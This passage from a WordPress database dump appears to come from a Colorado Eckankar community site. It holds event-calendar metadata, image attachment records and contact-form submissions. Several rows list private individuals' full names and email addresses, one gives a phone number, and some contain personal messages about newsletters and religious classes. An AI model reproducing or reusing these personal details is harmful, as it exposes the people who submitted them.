address.'),(147061,265677,'_form_id','4'),(147062,265677,'_seq_num','17'),(147063,265678,'protect_children',''),(147064,265678,'_edit_lock','1633458036:2'),(147065,265678,'_edit_last','2'),(147066,265678,'mec_color',''),(147067,265678,'mec_location_id','118'),(147068,265678,'mec_dont_show_map','0'),(147069,265678,'mec_organizer_id','1'),(147070,265678,'mec_read_more',''),(147071,265678,'mec_more_info',''),(147072,265678,'mec_more_info_title',''),(147073,265678,'mec_more_info_target','_self'),(147074,265678,'mec_cost',''),(147075,265678,'mec_currency','a:0:{}'),(147076,265678,'mec_additional_organizer_ids','a:0:{}'),(147077,265678,'mec_additional_location_ids','a:0:{}'),(147078,265678,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-10\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(147079,265678,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(147080,265678,'mec_certain_weekdays','a:0:{}'),(147081,265678,'mec_allday','0'),(147082,265678,'one_occurrence','0'),(147083,265678,'mec_hide_time','0'),(147084,265678,'mec_hide_end_time','0'),(147085,265678,'mec_comment',''),(147086,265678,'mec_timezone','global'),(147087,265678,'mec_countdown_method','global'),(147088,265678,'mec_public','1'),(147089,265678,'mec_start_date','2021-10-10'),(147090,265678,'mec_start_time_hour','10'),(147091,265678,'mec_start_time_minutes','30'),(147092,265678,'mec_start_time_ampm','AM'),(147093,265678,'mec_start_day_seconds','37800'),(147094,265678,'mec_end_date','2021-10-10'),(147095,265678,'mec_end_time_hour','11'),(147096,265678,'mec_end_time_minutes','30'),(147097,265678,'mec_end_time_ampm','AM'),(147098,265678,'mec_end_day_seconds','41400'),(147099,265678,'mec_repeat_status','0'),(147100,265678,'mec_repeat_type',''),(147101,265678,'mec_repeat_interval','1'),(147102,265678,'mec_repeat_end',''),(147103,265678,'mec_repeat_end_at_occurrences',''),(147104,265678,'mec_repeat_end_at_date',''),(147105,265678,'mec_advanced_days','a:0:{}'),(147106,265678,'mec_in_days',''),(147107,265678,'mec_not_in_days',''),(147108,265678,'mec_hourly_schedules','a:0:{}'),(147109,265678,'mec_booking','a:0:{}'),(147110,265678,'mec_tickets','a:0:{}'),(147111,265678,'mec_fees_global_inheritance','1'),(147112,265678,'mec_fees','a:0:{}'),(147113,265678,'mec_ticket_variations_global_inheritance','1'),(147114,265678,'mec_ticket_variations','a:0:{}'),(147115,265678,'mec_reg_fields_global_inheritance','1'),(147116,265678,'mec_reg_fields','a:0:{}'),(147117,265678,'mec_bfixed_fields','a:0:{}'),(147118,265678,'mec_op','a:0:{}'),(147119,265678,'mec_fields','a:0:{}'),(147120,265678,'mec_event_status','EventScheduled'),(147121,265678,'mec_moved_online_link',''),(147122,265678,'mec_cancelled_reason',''),(147123,265678,'mec_display_cancellation_reason_in_single_page',''),(147124,265678,'boldgrid_hide_page_title','0'),(147125,265678,'_thumbnail_id','265679'),(147126,265678,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(147127,265678,'passster_activate_global_protection',NULL),(147128,265678,'passster_activate_protection',NULL),(147129,265678,'passster_protection_type','password'),(147130,265678,'sgpb_popup_events_custom','a:1:{i:264857;a:1:{i:0;s:5:\"click\";}}'),(147131,265678,'sg_popup_target_custom','a:1:{i:0;s:6:\"264857\";}'),(147132,265679,'_wp_attached_file','2021/10/sunset-eagle-1.jpg'),(147133,265679,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:538;s:6:\"height\";i:303;s:4:\"file\";s:26:\"2021/10/sunset-eagle-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"sunset-eagle-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"sunset-eagle-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"sunset-eagle-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"sunset-eagle-1-474x303.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:303;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"sunset-eagle-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"sunset-eagle-1-300x303.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:303;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"sunset-eagle-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(147134,265679,'original-file','2021/10/sunset-eagle-1-updraft-pre-smush-original.jpg'),(147135,265679,'smush-complete','1'),(147136,265679,'smush-info','The file was compressed from 29.01 KB to 27.55 KB saving 5.05 percent using WP-Optimize'),(147137,265679,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:29709;s:12:\"smushed-size\";i:28210;s:15:\"savings-percent\";d:5.04999999999999982236431605997495353221893310546875;}'),(147138,265680,'protect_children',''),(147139,265680,'_field_425','Test'),(147140,265680,'_field_426','Test'),(147141,265680,'_field_427','choll.03@comcast.net'),(147142,265680,'_form_id','46'),(147143,265680,'_seq_num','24'),(147144,265681,'_edit_lock','1638923207:2'),(147145,265681,'_edit_last','2'),(147146,265681,'mec_color',''),(147147,265681,'mec_location_id','122'),(147148,265681,'mec_dont_show_map','0'),(147149,265681,'mec_organizer_id','1'),(147150,265681,'mec_read_more',''),(147151,265681,'mec_more_info',''),(147152,265681,'mec_more_info_title',''),(147153,265681,'mec_more_info_target','_self'),(147154,265681,'mec_cost',''),(147155,265681,'mec_currency','a:0:{}'),(147156,265681,'mec_additional_organizer_ids','a:0:{}'),(147157,265681,'mec_additional_location_ids','a:0:{}'),(147158,265681,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-19\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-19\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(147159,265681,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(147160,265681,'mec_certain_weekdays','a:0:{}'),(147161,265681,'mec_allday','0'),(147162,265681,'one_occurrence','0'),(147163,265681,'mec_hide_time','0'),(147164,265681,'mec_hide_end_time','0'),(147165,265681,'mec_comment',''),(147166,265681,'mec_timezone','global'),(147167,265681,'mec_countdown_method','global'),(147168,265681,'mec_public','1'),(147169,265681,'mec_start_date','2021-10-19'),(147170,265681,'mec_start_time_hour','8'),(147171,265681,'mec_start_time_minutes','0'),(147172,265681,'mec_start_time_ampm','AM'),(147173,265681,'mec_start_day_seconds','28800'),(147174,265681,'mec_end_date','2021-10-19'),(147175,265681,'mec_end_time_hour','6'),(147176,265681,'mec_end_time_minutes','0'),(147177,265681,'mec_end_time_ampm','PM'),(147178,265681,'mec_end_day_seconds','64800'),(147179,265681,'mec_repeat_status','1'),(147180,265681,'mec_repeat_type','advanced'),(147181,265681,'mec_repeat_interval','1'),(147182,265681,'mec_repeat_end','occurrences'),(147183,265681,'mec_repeat_end_at_occurrences','9'),(147184,265681,'mec_repeat_end_at_date',''),(147185,265681,'mec_advanced_days','a:1:{i:0;s:5:\"Tue.3\";}'),(147186,265681,'mec_in_days',''),(147187,265681,'mec_not_in_days',''),(147188,265681,'mec_hourly_schedules','a:0:{}'),(147189,265681,'mec_booking','a:0:{}'),(147190,265681,'mec_tickets','a:0:{}'),(147191,265681,'mec_fees_global_inheritance','1'),(147192,265681,'mec_fees','a:0:{}'),(147193,265681,'mec_ticket_variations_global_inheritance','1'),(147194,265681,'mec_ticket_variations','a:0:{}'),(147195,265681,'mec_reg_fields_global_inheritance','1'),(147196,265681,'mec_reg_fields','a:0:{}'),(147197,265681,'mec_bfixed_fields','a:0:{}'),(147198,265681,'mec_op','a:0:{}'),(147199,265681,'mec_fields','a:0:{}'),(147200,265681,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(147201,265681,'mec_event_status','EventScheduled'),(147202,265681,'mec_moved_online_link',''),(147203,265681,'mec_cancelled_reason',''),(147204,265681,'mec_display_cancellation_reason_in_single_page',''),(147205,265681,'protect_children',''),(147206,265681,'passster_activate_global_protection',NULL),(147207,265681,'passster_activate_protection',NULL),(147208,265681,'passster_protection_type','password'),(147209,265681,'boldgrid_hide_page_title','0'),(147210,265682,'_field_425','Bonnie'),(147211,265682,'_field_426','Greenstreet'),(147212,265682,'_field_427','bghuhummer@gmail.com'),(147213,265682,'_form_id','46'),(147214,265682,'_seq_num','25'),(149504,265891,'_field_138','Dear friends,\n\nI hope all is well with you in the big city!  Out here in the hinterlands of the high country I look forward to receiving monthly updates on events for the month.  I suspect that I somehow have fallen off that list as I didn\'t receive any email of events for the month of November but had received one for October.  Please look at your system to see if my email address is included.  \n\nThank you for all you do for the ECK!\n\nMichael Fischer'),(149490,265889,'_form_id','44'),(149489,265889,'_field_404','mfischerak@gmail.com'),(149488,265889,'_field_403','Fischer'),(149484,265888,'_field_138','I\'m receiving your online newsletter, live in Delaware, and would love to join a Zoom Satsang Class.\n\nIt appears they are only open to Colorado and Utah residents.\n\nCan an exception be made for me, and allow me to participate in The Secret Way class?\n'),(169130,267185,'boldgrid_in_page_containers','1'),(169128,267185,'passster_activate_protection',NULL),(169129,267185,'passster_protection_type','password'),(147292,265690,'_field_425','Lexi'),(147293,265690,'_field_426','Massey'),(147294,265690,'_field_427','AlexaReevesMassey@gmail.com'),(147295,265690,'_form_id','46'),(147296,265690,'_seq_num','26'),(147297,265691,'mec_moved_online_link',''),(147298,265691,'mec_cancelled_reason',''),(147299,265691,'mec_display_cancellation_reason_in_single_page',''),(147300,265691,'boldgrid_hide_page_title','0'),(147301,265691,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(147302,265691,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-18\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-18\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(147303,265691,'mec_currency','a:0:{}'),(147304,265691,'mec_additional_organizer_ids','a:0:{}'),(147305,265691,'mec_additional_location_ids','a:0:{}'),(147306,265691,'mec_cost',''),(147307,265691,'mec_more_info_target','_self'),(147308,265691,'mec_more_info_title',''),(147309,265691,'mec_organizer_id','1'),(147310,265691,'mec_read_more',''),(147311,265691,'mec_more_info',''),(147312,265691,'mec_repeat_type',''),(147313,265691,'mec_repeat_status','0'),(147314,265691,'mec_end_day_seconds','57600'),(147315,265691,'mec_end_time_ampm','PM'),(147316,265691,'mec_end_time_minutes','0'),(147317,265691,'mec_end_time_hour','4'),(147318,265691,'mec_end_date','2021-10-18'),(147319,265691,'mec_start_day_seconds','54000'),(147320,265691,'mec_start_time_ampm','PM'),(147321,265691,'mec_start_time_minutes','0'),(147322,265691,'mec_public','1'),(147323,265691,'mec_start_date','2021-10-18'),(147324,265691,'mec_start_time_hour','3'),(147325,265691,'mec_countdown_method','global'),(147326,265691,'mec_timezone','global'),(147327,265691,'mec_comment',''),(147328,265691,'one_occurrence','0'),(147329,265691,'mec_hide_time','0'),(147330,265691,'mec_hide_end_time','0'),(147331,265691,'mec_event_status','EventScheduled'),(147332,265691,'mec_fields','a:0:{}'),(147333,265691,'mec_op','a:0:{}'),(147334,265691,'mec_bfixed_fields','a:0:{}'),(147335,265691,'mec_reg_fields','a:0:{}'),(147336,265691,'mec_reg_fields_global_inheritance','1'),(147337,265691,'mec_ticket_variations','a:0:{}'),(147338,265691,'mec_ticket_variations_global_inheritance','1'),(147339,265691,'mec_fees','a:0:{}'),(147340,265691,'mec_booking','a:0:{}'),(147341,265691,'mec_tickets','a:0:{}'),(147342,265691,'mec_fees_global_inheritance','1'),(147343,265691,'mec_hourly_schedules','a:0:{}'),(147344,265691,'mec_not_in_days',''),(147345,265691,'mec_in_days',''),(147346,265691,'mec_repeat_end_at_date',''),(147347,265691,'mec_advanced_days','a:0:{}'),(147348,265691,'passster_protection_type','password'),(147349,265691,'passster_activate_global_protection',NULL),(147350,265691,'passster_activate_protection',NULL),(147351,265691,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(147352,265691,'mec_repeat_end_at_occurrences',''),(147353,265691,'mec_repeat_end',''),(147354,265691,'mec_repeat_interval','1'),(147355,265691,'mec_allday','0'),(147356,265691,'mec_certain_weekdays','a:0:{}'),(147357,265691,'mec_dont_show_map','0'),(147358,265691,'mec_location_id','118'),(147359,265691,'mec_color',''),(147360,265691,'protect_children',''),(147361,265691,'_edit_lock','1633622220:2'),(147362,265691,'_edit_last','2'),(147363,265691,'_thumbnail_id','265692'),(147364,265692,'_wp_attached_file','2021/10/canyon-trail-1.jpg'),(147365,265692,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:509;s:6:\"height\";i:287;s:4:\"file\";s:26:\"2021/10/canyon-trail-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"canyon-trail-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"canyon-trail-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"canyon-trail-1-300x287.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"canyon-trail-1-474x287.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"canyon-trail-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"canyon-trail-1-300x287.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"canyon-trail-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(147366,265692,'original-file','2021/10/canyon-trail-1-updraft-pre-smush-original.jpg'),(147367,265692,'smush-complete','1'),(147368,265692,'smush-info','The file was compressed from 43.93 KB to 41.72 KB saving 5.03 percent using WP-Optimize'),(147369,265692,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:44987;s:12:\"smushed-size\";i:42724;s:15:\"savings-percent\";d:5.03000000000000024868995751603506505489349365234375;}'),(147370,265694,'_field_133','Ky'),(147371,265694,'_field_134','Schieb'),(147372,265694,'_field_135','grouptixs@gmail.com'),(147373,265694,'_field_137','Eckankar and Upcoming Disney On Ice Shows'),(147374,265694,'_field_138','I work for Disney On Ice. Disney On Ice is coming to Denver Dec. 2-5th. We are reaching out to local area churches. To offer them the best pricing and seating as a group. Please email or call 303-918-7489'),(147375,265694,'_form_id','13'),(147376,265694,'_seq_num','86'),(147377,265695,'mec_read_more',''),(147378,265695,'mec_organizer_id','1'),(147379,265695,'mec_more_info_title',''),(147380,265695,'mec_more_info_target','_self'),(147381,265695,'mec_cost',''),(147382,265695,'mec_additional_location_ids','a:0:{}'),(147383,265695,'mec_additional_organizer_ids','a:0:{}'),(147384,265695,'mec_currency','a:0:{}'),(147385,265695,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-04-22\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-04-22\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(147387,265695,'_edit_last','2'),(147388,265695,'_edit_lock','1633644631:2'),(147389,265695,'mec_repeat_end_at_occurrences',''),(147390,265695,'mec_repeat_end',''),(147391,265695,'mec_repeat_interval','1'),(147392,265695,'mec_allday','0'),(147393,265695,'mec_certain_weekdays','a:0:{}'),(147394,265695,'mec_dont_show_map','0'),(147395,265695,'mec_location_id','118'),(147396,265695,'mec_color',''),(147397,265695,'protect_children',''),(147398,265695,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(147399,265695,'passster_activate_protection',''),(147400,265695,'passster_activate_global_protection',''),(147401,265695,'passster_protection_type','password'),(147402,265695,'mec_advanced_days','a:0:{}'),(147403,265695,'mec_repeat_end_at_date',''),(147404,265695,'mec_in_days',''),(147405,265695,'mec_not_in_days',''),(147406,265695,'mec_hourly_schedules','a:0:{}'),(147407,265695,'mec_fees_global_inheritance','1'),(147408,265695,'mec_tickets','a:0:{}'),(147409,265695,'mec_booking','a:0:{}'),(147410,265695,'mec_fees','a:0:{}'),(147411,265695,'mec_ticket_variations_global_inheritance','1'),(147412,265695,'mec_ticket_variations','a:0:{}'),(147413,265695,'mec_reg_fields_global_inheritance','1'),(147414,265695,'mec_reg_fields','a:0:{}'),(147415,265695,'mec_bfixed_fields','a:0:{}'),(147416,265695,'mec_op','a:0:{}'),(147417,265695,'mec_fields','a:0:{}'),(147418,265695,'mec_hide_time','0'),(147419,265695,'mec_hide_end_time','0'),(147420,265695,'mec_event_status','EventScheduled'),(147421,265695,'mec_start_time_minutes','0'),(147422,265695,'mec_public','1'),(147423,265695,'mec_start_date','2021-04-22'),(147424,265695,'mec_start_time_hour','8'),(147425,265695,'mec_countdown_method','global'),(147426,265695,'mec_timezone','global'),(147427,265695,'mec_comment',''),(147428,265695,'one_occurrence','0'),(147429,265695,'mec_start_time_ampm','AM'),(147430,265695,'mec_start_day_seconds','28800'),(147431,265695,'mec_end_date','2021-04-22'),(147432,265695,'mec_end_time_hour','6'),(147433,265695,'mec_end_time_minutes','0'),(147434,265695,'mec_end_time_ampm','PM'),(147435,265695,'mec_end_day_seconds','64800'),(147436,265695,'mec_repeat_status','0'),(147437,265695,'mec_repeat_type',''),(147438,265695,'mec_more_info',''),(147439,265695,'mec_display_cancellation_reason_in_single_page',''),(147440,265695,'boldgrid_hide_page_title','0'),(147441,265695,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(147442,265695,'mec_cancelled_reason',''),(147443,265695,'mec_moved_online_link',''),(147444,265696,'_field_224','Reid'),(147445,265696,'_field_225','Heassler'),(147446,265696,'_field_226','jartzchongrh@live.com'),(147447,265696,'_field_227','CO'),(147448,265696,'_field_228','US'),(147449,265696,'_field_229','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(147450,265696,'_form_id','21'),(147451,265696,'_seq_num','133'),(147508,265705,'_field_425','Jeremy'),(147509,265705,'_field_426','Martin'),(147510,265705,'_field_427','jeremym@eldoradosprings.com'),(147511,265705,'_form_id','46'),(147512,265705,'_seq_num','27'),(147521,265707,'_field_425','chris'),(147522,265707,'_field_426','taylor'),(147523,265707,'_field_427','christaylr@att.net'),(147524,265707,'_form_id','46'),(147525,265707,'_seq_num','28'),(147687,265728,'_field_224','Francy'),(147688,265728,'_field_225','Ugolini'),(147689,265728,'_field_226','frugo@centurylink.net'),(147690,265728,'_field_227','CO'),(147691,265728,'_field_228','US'),(147692,265728,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in 